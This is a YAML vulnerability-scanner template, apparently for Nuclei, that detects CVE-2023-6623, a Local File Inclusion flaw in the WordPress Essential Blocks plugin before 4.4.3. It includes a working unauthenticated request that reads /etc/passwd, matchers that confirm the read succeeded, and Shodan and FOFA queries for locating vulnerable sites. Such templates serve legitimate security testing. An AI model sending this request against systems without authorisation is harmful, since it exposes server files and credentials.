Description
Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
id: CVE-2023-6623
info:
name: Essential Blocks < 4.4.3 - Local File Inclusion
author: iamnoooob,rootxharsh,pdresearch,coldfish
severity: critical
description: |
Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
impact: |
An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
remediation: |
Upgrade to the latest version of Essential Blocks 4.4.3 to fix this issue.
reference:
- https://wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/
- https://flysec-blog.blogspot.com/2024/01/cve-2023-6623-file-inclusion.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6623
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6623
cwe-id: CWE-22
epss-score: 0.50673
epss-percentile: 0.98859
cpe: cpe:2.3:a:wpdeveloper:essential_blocks:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wpdeveloper
product: essential_blocks
framework: wordpress
shodan-query: http.html:/wp-content/plugins/essential-blocks/
fofa-query: body=/wp-content/plugins/essential-blocks/
publicwww-query: "/wp-content/plugins/essential-blocks/"
tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper,vkev,vuln
http:
- method: GET
path:
- '{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}'
- '{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt'
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "regex('root:.*:0:0:', body_1)"
- 'contains(body_2, "Essential Blocks – Page")'
condition: and
# digest: 4a0a0047304502202e5427587aa93f08d25ee8f41f5f05b85e2c7035301ff7d7f906a1677e17fd74022100c3535705f20409cb3756b3c9fba69c1aa90c2034039d0c21b24e0e8234c74aac:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.